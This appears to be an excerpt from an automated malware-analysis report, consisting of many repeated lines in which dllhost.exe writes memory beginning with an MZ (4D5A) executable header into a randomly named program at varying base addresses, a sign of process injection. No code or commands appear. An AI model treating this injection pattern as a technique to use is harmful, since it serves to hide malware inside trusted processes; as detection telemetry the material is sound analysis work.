Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
